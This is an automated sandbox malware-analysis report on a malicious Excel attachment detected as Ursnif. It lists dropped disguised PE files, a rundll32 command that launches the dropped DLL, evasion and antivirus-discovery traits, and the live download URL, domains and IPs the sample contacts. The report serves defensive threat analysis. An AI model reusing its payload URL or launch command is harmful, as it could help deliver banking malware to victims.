Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].png Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\cnvmb.rty Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\cnvmb.rty Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].png Jump to dropped file
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10001601 GetModuleHandleW,LoadLibraryW,GetProcAddress, 4_2_10001601
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00180940 mov eax, dword ptr fs:[00000030h] 4_2_00180940

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer Jump to behavior
Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001A212D cpuid 4_2_001A212D
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage, 4_2_001A340B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001AAEF6 GetSystemTimeAsFileTime,SetWaitableTimer, 4_2_001AAEF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001A212D GetUserNameW, 4_2_001A212D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001AA06E CreateMutexW,GetLastError,CloseHandle,GetLastError,GetVersionExA,GetModuleHandleA,RtlImageNtHeader,CloseHandle, 4_2_001AA06E
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmp Binary or memory string: V%ProgramFiles%\Windows Defender\MSASCui.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - select * from antispywareproduct

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 333660 Sample: OCC-221220-TBU1XAT7X4.xls Startdate: 23/12/2020 Architecture: WINDOWS Score: 100 32 Antivirus detection for dropped file 2->32 34 Document exploit detected (drops PE files) 2->34 36 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->36 38 6 other signatures 2->38 7 EXCEL.EXE 83 41 2->7         started        12 iexplore.exe 2 39 2->12         started        process3 dnsIp4 30 companieshouseonlinedownload.com 47.254.169.221, 49167, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 7->30 24 C:\Users\user\cnvmb.rty, PE32 7->24 dropped 26 C:\Users\user\AppData\Local\...\ox9[1].png, PE32 7->26 dropped 44 Document exploit detected (process start blacklist hit) 7->44 46 Document exploit detected (UrlDownloadToFile) 7->46 14 rundll32.exe 7->14         started        16 iexplore.exe 21 12->16         started        19 iexplore.exe 11 12->19         started        file5 signatures6 process7 dnsIp8 21 rundll32.exe 14->21         started        28 hospader.xyz 45.142.212.128, 443, 49168, 49169 ALEXHOSTMD Russian Federation 16->28 process9 signatures10 40 Writes registry values via WMI 21->40 42 Creates a COM Internet Explorer object 21->42
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
47.254.169.221
 unknown United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC false
45.142.212.128
 unknown Russian Federation
200019 ALEXHOSTMD false

Contacted Domains

Name IP Active
companieshouseonlinedownload.com 47.254.169.221 true
hospader.xyz 45.142.212.128 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://companieshouseonlinedownload.com/ox9.png true
  • Avira URL Cloud: safe
 unknown